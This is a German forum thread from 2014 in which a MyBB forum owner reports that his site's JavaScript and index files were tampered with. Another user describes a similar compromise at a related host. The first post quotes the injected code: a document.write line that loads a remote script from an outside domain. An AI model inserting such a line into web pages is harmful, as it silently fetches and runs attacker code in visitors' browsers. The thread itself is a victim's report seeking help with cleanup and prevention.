MyBB.de Forum
Fremdcode in JS-Dateien? - Druckversion

+- MyBB.de Forum (https://www.mybb.de/forum)
+-- Forum: Archiv (https://www.mybb.de/forum/forum-57.html)
+--- Forum: MyBB 1.6.x (https://www.mybb.de/forum/forum-58.html)
+---- Forum: Sonstiges (https://www.mybb.de/forum/forum-62.html)
+---- Thema: Fremdcode in JS-Dateien? (/thread-29328.html)



Fremdcode in JS-Dateien? - MarioxD - 13.03.2014

Guten Abend zusammen,

gerade eben habe ich verdächtige Zugriffszeiten auf die Dateien meines Forums entdeckt und dabei festgestellt, dass sämtliche JS-Dateien und weiterhin die admin/index.php, install/index.php sowie die archive/index.php modifiziert wurden.

An sämtliche JS-Files im Foren-Ordner wurde Inhalt folgender Art angehängt:

Code:
/*e16e8d*/

/*kk09486k09*/

document.write("<script type='text/javascript' src='http://ristorantegarbino.com/zH8GmbQW.php?id=9806215'></"+ "script>");

/*/e16e8d*/

Wobei sich sowohl Kommentare als auch ID unterscheiden.
Ich nehme an, dass dieser Code nicht zur Forensoftware gehört?
Verwendet wird MyBB 1.6 bei bplaced.net

Hattet ihr schon ähnliche Vorkommnisse?
Wie sind diese zu verhindern, angenommen der Zugriff auf den Server findet schon via FTPES statt?

Mfg
Mario


RE: Fremdcode in JS-Dateien? - Juventiner - 13.03.2014

Hi,

ich hatte ähnliches bei square7.ch. Selber Hoster, ob es die gleichen Server sind weiß ich nicht.
Bei mir habe ich das durch extrem hohe Speicherauslastung gemerkt. Habe ZUFÄLLIG etliche Zehntausend .html Dateien gefunden, welche ca. 500 MB hatten an Masse. Nachdem ich sie löschte sind diese einige Zeit später wieder aufgetaucht.